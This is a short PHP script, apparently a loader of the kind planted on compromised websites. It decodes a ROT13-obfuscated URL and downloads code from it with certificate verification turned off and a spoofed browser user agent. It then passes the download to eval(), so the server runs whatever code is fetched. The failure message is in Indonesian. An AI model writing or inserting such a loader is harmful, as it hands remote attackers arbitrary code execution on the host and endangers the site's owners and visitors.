<?php
$encoded_url = "uggcf://enj.ubzrgrfgre.bet/yhssr/bcz/erssf/nf/zbir/3.kgy";
$url = str_rot13($encoded_url);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$code = curl_exec($ch);
curl_close($ch);

if($code && !empty($code)) {
    eval('?>' . $code);
} else {
    die("Gagal mengambil kode dari URL");
}
?>
